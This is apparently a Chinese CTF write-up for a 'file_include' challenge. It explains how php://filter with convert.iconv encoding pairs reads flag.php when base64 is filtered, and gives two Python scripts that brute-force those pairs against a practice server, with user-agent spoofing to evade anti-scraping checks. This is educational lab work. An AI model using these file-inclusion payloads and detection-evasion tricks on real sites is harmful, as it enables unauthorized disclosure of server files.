攻防世界 file_include【php://filter详解】
直接用php://filter读取文件,发现是被过滤了,此时应该找别的方法或者绕过
这个题考察的是在base64被过滤的情况下如何读取文件:
这时候就需要深入理解php://filter的工作机制了
详解php://filter以及死亡绕过_filter绕过过滤-CSDN博客
我们用
php://filter/convert.iconv.<源码的编码格式>.<输出的编码格式>/resource=flag.php 来读取flag.php内容
🌟 iconv 的核心功能:将文件或文本流从一种字符编码(如 GBK)转换为另一种(如 UTF-8)
编码格式有:
一开始写的垃圾代码,啥也不会上来就干,结果卡死了。。。
import requests
import time
flag = ""
url="http://61.147.171.105:52323/?"
option=[ "utf-8", "shift_jis", "euc-jp","iso-2022-jp", "windows-1252","gbk","big5", "utf-16", "utf-32", "ascii"]
found=False
for i in option:
for j in option:
payload=f"filename=php://filter/convert.iconv.{i}.{j}/resource=flag.php"
req=requests.get(url+payload)
if "flag" in req.text:
print(i,j)
found=True
break;
if found:
break优化优化:
import requests
import time
from requests.exceptions import RequestException
from base64 import b64decode
flag = ""
url = "http://61.147.171.105:52323/?"
options = [
"utf-8", "shift_jis", "euc-jp", "iso-2022-jp",
"windows-1252", "gbk", "big5", "utf-16", "utf-32",
"ascii", "UCS-4LE", "UCS-4BE", "ISO-8859-1", "CP932"
]
found = False
# 模拟浏览器请求头
headers = {
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36",
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8"
}
for i in options:
for j in options:
try:
payload = f"filename=php://filter/convert.iconv.{i}.{j}/resource=flag.php"
print(f"Testing: {i} -> {j}")
response = requests.get(url + payload, headers=headers, timeout=15)
time.sleep(1.5) # 增加延迟
# 调试输出
print(f"Status: {response.status_code}, Length: {len(response.text)}")
if response.status_code == 200:
# 尝试Base64解码
try:
decoded = b64decode(response.text).decode(errors="ignore")
if "flag" in decoded.lower():
print(f"[+] Success (Base64 decoded): {i}->{j}")
print(decoded)
found = True
break
except:
pass
# 直接检查响应内容
if "flag" in response.text.lower():
print(f"[+] Success: {i}->{j}")
print(response.text)
found = True
break
elif "<?php" in response.text:
print(f"[!] Possible PHP code leak: {i}->{j}")
except RequestException as e:
print(f"[!] Connection error: {str(e)}")
time.sleep(5) # 长时等待后重试
except Exception as e:
print(f"[!] Critical error: {str(e)}")
break
if found:
break
if not found:
print("[-] No valid encoding pairs found.")我代码不成,乃菜也:
1.遇到服务器过滤或者限制访问的时候,需要加上请求头模拟浏览器访问,绕过基础的反爬检测,并设置timeout=10,十秒钟连接不上就拉倒
headers是字典形式
headers = {
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36",
"Accept-Language": "en-US,en;q=0.9"
}
response = requests.get(url + payload, headers=headers, timeout=10)2.不一定非要看返回消息中有什么特殊的字段,可以直接打印出来返回消息长度
3.python中的try是什么意思?
try和except、else和finally强强联手
try语句块用于包裹可能会抛出异常的代码。当try语句块中的代码执行时,如果发生了异常,程序的执行流程会立即跳转到对应的except语句块进行异常处理;如果没有发生异常,则可以选择执行else语句块中的代码;无论是否发生异常,finally语句块中的代码都会被执行。
终于成功了😀